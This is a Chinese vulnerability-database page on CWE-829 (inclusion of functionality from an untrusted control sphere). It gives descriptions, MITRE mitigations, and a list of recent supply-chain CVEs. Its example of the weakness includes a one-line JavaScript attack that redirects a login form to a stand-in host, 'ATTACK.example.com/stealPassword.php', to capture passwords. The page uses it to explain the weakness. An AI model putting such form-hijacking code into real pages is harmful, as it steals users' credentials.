目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CWE-829 从非可信控制范围包含功能例程 类漏洞列表 167

CWE-829 从非可信控制范围包含功能例程 类弱点 167 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-829 属于不信任源引入漏洞,指软件从非预期控制域导入可执行功能或库。攻击者常通过篡改第三方依赖或供应链,注入恶意代码以执行任意操作,从而破坏系统完整性。开发者应严格验证所有外部组件的来源与完整性,仅集成受信任且经过安全审计的库,并实施最小权限原则,确保仅加载符合预期的功能模块,以阻断不可信代码的执行路径。

MITRE CWE 官方描述
CWE:CWE-829 从不受信任的控制域(Untrusted Control Sphere)中引入功能 英文:产品从预期控制域(Intended Control Sphere)之外的源导入、需要或包含可执行功能(如库)。
常见影响 (1)
Confidentiality, Integrity, Availability Execute Unauthorized Code or Commands
An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. This could enable the injection of malware, information exposure by granting excessive privileges or…
缓解措施 (5)
Architecture and Design Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Architecture and Design When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Architecture and Design For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design, Operation Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited
Architecture and Design, Operation Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
代码示例 (1)
This login webpage includes a weather widget from an external website:
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>
Bad · HTML
...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";
Attack · JavaScript
CVE ID 标题 CVSS 风险等级 Published
CVE-2026-0303 Prisma Checkov 配置文件自动加载导致代码执行漏洞 — Checkov by Prisma Cloud 2.4 Low 2026-09-10
CVE-2026-79721 MLflow 0.0.1+ 模型加载任意代码执行 — mlflow 8.6 High 2026-09-08
CVE-2026-86504 JetBrains IntelliJ IDEA 软件供应链问题漏洞 — IntelliJ IDEA 7.8 High 2026-09-07
CVE-2026-86169 Axolotl AI Axolotl 软件供应链问题漏洞 — axolotl 8.8 High 2026-09-05
CVE-2026-58569 Dell PowerStore 软件供应链问题漏洞 — PowerStore 500T 8.8 High 2026-09-01
CVE-2026-18252 GitLab 软件供应链问题漏洞 — GitLab 7.3 High 2026-08-26
CVE-2026-76139 Stolostron acm-operator-bundle 软件供应链问题漏洞 — Red Hat Advanced Cluster Management for Kubernetes 2.11 8.0 High 2026-08-19
CVE-2026-73367 supsystic Easy Google Maps 软件供应链问题漏洞 — Easy Google Maps 7.2 High 2026-08-18
CVE-2026-49986 Clement Cortex 软件供应链问题漏洞 — Cortex 7.1 High 2026-08-14
CVE-2026-19884 Eclipse Theia 配置错误漏洞 — Eclipse Theia 8.4 High 2026-08-14
CVE-2026-6464 PostgreSQL 软件供应链问题漏洞 — PostgreSQL 8.1 High 2026-08-13
CVE-2026-18408 PostgreSQL 软件供应链问题漏洞 — PostgreSQL 8.8 High 2026-08-13
CVE-2026-71471 Red Hat acm-search-v2-api 软件供应链问题漏洞 — Red Hat Advanced Cluster Management for Kubernetes 2.11 9.0 Critical 2026-08-12
CVE-2026-54981 Microsoft Python extension for Visual Studio Code 处理逻辑错误漏洞 — Python extension for Visual Studio Code 7.8 High 2026-08-11
CVE-2026-62902 Microsoft .NET 处理逻辑错误漏洞 — .NET 8.0 6.5 Medium 2026-08-11
CVE-2026-15560 Red Hat JBoss Enterprise Application Platform 软件供应链问题漏洞 — Red Hat JBoss Enterprise Application Platform 7.4.25 8.1 High 2026-08-11
CVE-2026-66843 René Föhring HtmlSanitizeEx 软件供应链问题漏洞 — html_sanitize_ex 2.3 Low 2026-08-06
CVE-2026-67623 mistralai mistral-vibe 软件供应链问题漏洞 — mistral-vibe 8.8 High 2026-08-05
CVE-2026-47781 PDM 软件供应链问题漏洞 — pdm 8.4 High 2026-08-04
CVE-2026-66141 Exim 软件供应链问题漏洞 — Exim 7.4 High 2026-07-24
CVE-2026-65908 JetBrains PyCharm 软件供应链问题漏洞 — PyCharm 8.6 High 2026-07-23
CVE-2026-64811 JetBrains IntelliJ IDEA 软件供应链问题漏洞 — IntelliJ IDEA 7.8 High 2026-07-23
CVE-2026-64807 JetBrains WebStorm 软件供应链问题漏洞 — WebStorm 7.8 High 2026-07-23
CVE-2026-64808 JetBrains PhpStorm 软件供应链问题漏洞 — PhpStorm 8.4 High 2026-07-23
CVE-2026-64809 JetBrains PhpStorm 软件供应链问题漏洞 — PhpStorm 8.4 High 2026-07-23
CVE-2026-64806 JetBrains WebStorm 软件供应链问题漏洞 — WebStorm 8.4 High 2026-07-23
CVE-2026-64804 JetBrains WebStorm 软件供应链问题漏洞 — WebStorm 8.4 High 2026-07-23
CVE-2026-64805 JetBrains WebStorm 软件供应链问题漏洞 — WebStorm 8.4 High 2026-07-23
CVE-2026-16085 Sipeed PicoClaw 软件供应链问题漏洞 — PicoClaw 5.3 Medium 2026-07-18
CVE-2026-57860 Tailcall Forge 软件供应链问题漏洞 — forgecode 7.8 High 2026-07-17

CWE-829(从非可信控制范围包含功能例程) 是常见的弱点类别,本平台收录该类弱点关联的 167 条 CVE 漏洞。